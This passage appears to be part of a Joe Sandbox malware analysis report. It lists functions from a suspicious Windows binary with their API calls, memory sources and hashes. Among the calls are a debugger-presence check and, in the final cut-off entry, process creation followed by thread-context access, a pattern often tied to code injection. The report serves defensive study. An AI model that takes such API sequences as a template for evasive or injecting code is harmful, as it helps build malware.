                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                              • String ID: X
                                                                              • API String ID: 3777226403-3081909835
                                                                              • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                              • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                              • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                              • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                              Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                              • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                              • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                              • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                              Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                              • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                              • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                              • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                              Function 02F37DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID:
                                                                              • API String ID: 3545744682-0
                                                                              • Opcode ID: 55d9f3e753e91e436d333c3ed70e5cbd2de8a0741c78a1b0dee000cdbbca84b9
                                                                              • Instruction ID: 3fe6637e4d736661494864b284f748ed187aa1323469f16b85bd32d256cca1d2
                                                                              • Opcode Fuzzy Hash: 55d9f3e753e91e436d333c3ed70e5cbd2de8a0741c78a1b0dee000cdbbca84b9
                                                                              • Instruction Fuzzy Hash: E62136E1E893046BFA3776149C05FB9FB656B52BD4F844449FB8B152C2D368A408C263
                                                                              Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00404370
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$_memset
                                                                              • String ID:
                                                                              • API String ID: 1505330794-0
                                                                              • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                              • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                              • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                              • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                              Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                              • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              • RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1372826849-0
                                                                              • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                              • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                              • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                              • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                              Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                              • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                              • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                              • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                              • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                              • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                              Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00468D1B
                                                                                • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                              • _free.LIBCMT ref: 00468D2C
                                                                              • _free.LIBCMT ref: 00468D3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                              • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                              • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                              • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                              Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CALL
                                                                              • API String ID: 0-4196123274
                                                                              • Opcode ID: dd8ecfee2abaac2f9f7b630f8790619e0510a978f5d7925f04c748017d308794
                                                                              • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                              • Opcode Fuzzy Hash: dd8ecfee2abaac2f9f7b630f8790619e0510a978f5d7925f04c748017d308794
                                                                              • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                              Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                              • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                                                              • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                              • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                                                              Function 02F15A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,02F155C0,?,00000000,00000000), ref: 02F15A51
                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 02F15B11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateExitUser
                                                                              • String ID:
                                                                              • API String ID: 4108186749-0
                                                                              • Opcode ID: 027d3460f8d7b387f6865a660d48bedd74679bfcbc2d0009602d50ac45aee52b
                                                                              • Instruction ID: 3aa96724f7b415c1c92dea1e139516b1efb8dc617b5820e59e1c571f5385c1df
                                                                              • Opcode Fuzzy Hash: 027d3460f8d7b387f6865a660d48bedd74679bfcbc2d0009602d50ac45aee52b
                                                                              • Instruction Fuzzy Hash: 98112915E4D3C24EE7278B784865366BFA05FD36A8FC902C6D2A18E0E3D359450D87A3
                                                                              Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsThemeActive.UXTHEME ref: 00404834
                                                                                • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 1438897964-0
                                                                              • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                              • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                              • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                              • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                              Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                              • std::exception::exception.LIBCMT ref: 00420DEC
                                                                              • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                              • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                                              • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                              • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                              Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                              • __lock_file.LIBCMT ref: 004253EB
                                                                                • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                              • __fclose_nolock.LIBCMT ref: 004253F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                              • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                              • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                              • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                              Function 02F15D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02F15D6D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 679fc0b7d9a55355b7f5a4633f80b32c63c251404629007b41ffb3417eef5966
                                                                              • Instruction ID: 0d76d990074da8bf386d19fc21c93880c063a494d87ecfea6b5f8b3215330526
                                                                              • Opcode Fuzzy Hash: 679fc0b7d9a55355b7f5a4633f80b32c63c251404629007b41ffb3417eef5966
                                                                              • Instruction Fuzzy Hash: 47F0E990E4C310EADD7E0364F94DB71BA2067C16ECFCC4549EB43590B3CB512816CB01
                                                                              Function 00A895E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00A89DA3
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A89E39
